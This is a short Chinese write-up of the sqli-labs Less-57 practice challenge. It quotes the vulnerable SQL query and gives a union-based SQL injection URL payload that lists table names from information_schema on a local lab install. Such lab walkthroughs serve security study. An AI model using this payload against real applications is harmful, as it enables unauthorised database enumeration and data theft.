与less54、55、56形式是一致的,我们关注sql语句

$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

因此给出示例payload

http://127.0.0.1/sql/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Sqli-labs Less-57 union注入 14次机会

相关文章:

  • 2021-09-20
  • 2021-10-02
  • 2022-01-19
  • 2021-10-07
  • 2021-07-15
  • 2022-01-24
  • 2022-02-25
  • 2021-06-24
猜你喜欢
  • 2022-02-19
  • 2022-01-19
  • 2021-08-20
  • 2021-10-19
  • 2021-06-20
  • 2021-12-24
  • 2021-07-28
相关资源
相似解决方案